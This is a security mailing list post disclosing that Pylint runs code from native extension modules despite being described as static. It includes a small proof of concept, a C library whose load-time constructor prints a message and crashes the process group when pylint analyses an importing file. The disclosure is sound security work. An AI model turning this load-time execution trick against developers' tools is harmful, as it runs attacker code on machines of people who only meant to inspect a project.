|
Message-ID: <20140929123221.GA4178@jwilk.net> Date: Mon, 29 Sep 2014 14:32:21 +0200 From: Jakub Wilk <jwilk@...lk.net> To: oss-security@...ts.openwall.com Subject: Pylint checks not as static as one would think Pylint[0] is advertised as "a static code checker, meaning it can analyse your code without actually running it"[1] and that it "does not import live modules"[1]. This is, unfortunately, far from reality. Here's a PoC: $ cat moo.py from _moo import * $ cat moo.c #include <stdio.h> #include <signal.h> void __attribute__((constructor)) moo() { printf("moo!\n"); kill(0, SIGSEGV); } $ gcc -Wall -shared -fPIC moo.c -o _moo.so $ pylint moo.py No config file found, using default configuration moo! Segmentation fault My understanding is that upstream Pylint maintainers consider this behavior intentional[2]. But even then, I think it's a serious documentation flaw. Should a CVE ID be assigned to this bug? If yes, it should be a CVE-2010-XXXX. [0] http://www.pylint.org/ [1] http://docs.pylint.org/faq.html#about-pylint [2] https://bugs.debian.org/591676#28 -- Jakub Wilk
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.